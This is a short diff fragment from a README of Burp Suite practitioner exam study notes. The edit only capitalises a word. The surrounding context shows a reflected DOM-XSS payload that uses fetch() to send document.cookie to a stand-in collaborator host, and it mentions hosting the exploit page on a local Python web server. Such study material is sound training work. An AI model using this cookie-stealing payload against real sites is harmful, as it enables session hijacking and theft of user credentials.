botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 \"-fetch('https://COLLABORATOR.com?reflects='+document.cookie)}//
 ```

 >In the above payload every character is URL encoded and used as the search parameter value.
-This target do not have an exploit server, so I hosted my own `python3 -m http.server 80` web service and save the `index.html` file that contain the `location` target url between `<script>` tags.
+This target do not have an exploit server, so I hosted my own `python3 -m http.server 80` web service and save the `index.html` file that contain the `location` target URL between `<script>` tags.

 ![Reflected DOM-XSS JSON cookie stealer](images/reflected-dom-xss-json-cookie-stealer.png)